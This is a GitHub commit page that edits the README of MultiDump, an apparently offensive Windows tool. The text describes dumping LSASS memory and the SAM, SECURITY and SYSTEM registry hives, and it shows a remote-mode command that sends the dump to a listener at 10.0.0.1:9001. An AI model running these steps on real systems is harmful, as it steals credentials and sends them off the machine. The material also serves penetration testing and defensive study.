Skip to content

Commit

Permalink
Update README.md
Browse files Browse the repository at this point in the history
Xre0uS authored Aug 8, 2024
1 parent 972fc30 commit 92d3514
Showing 1 changed file with 2 additions and 2 deletions.
4 changes: 2 additions & 2 deletions README.md
Original file line number Diff line number Diff line change
@@ -74,6 +74,8 @@ MultiDump.exe
If `--procdump` is used, `ProcDump.exe` will be writtern to disk to dump LSASS.
In cmd, `--procdump` _must_ be used, or it will fail per [#5](https://github.com/Xre0uS/MultiDump/issues/5), recommend to always use powerhsell if possible.
In remote mode, MultiDump connects to the handler's listener.
```bash
@@ -85,8 +87,6 @@ In remote mode, MultiDump connects to the handler's listener.
MultiDump.exe -r 10.0.0.1:9001
```
In cmd, `--procdump` _must_ be used, or it will fail per [#5](https://github.com/Xre0uS/MultiDump/issues/5), recommend to always use powerhsell if possible.
The key is encrypted with the handler's IP and port. When MultiDump connects through a proxy, the handler should use the `--override-ip` option to manually specify the IP address for key generation in remote mode, ensuring decryption works correctly by matching the decryption IP with the expected IP set in MultiDump `-r`.
An additional option to dump the `SAM`, `SECURITY` and `SYSTEM` hives are available with `--reg`, the decryption process is the same as LSASS dumps. This is more of a convenience feature to make post exploit information gathering easier.

0 comments on commit 92d3514

Please sign in to comment.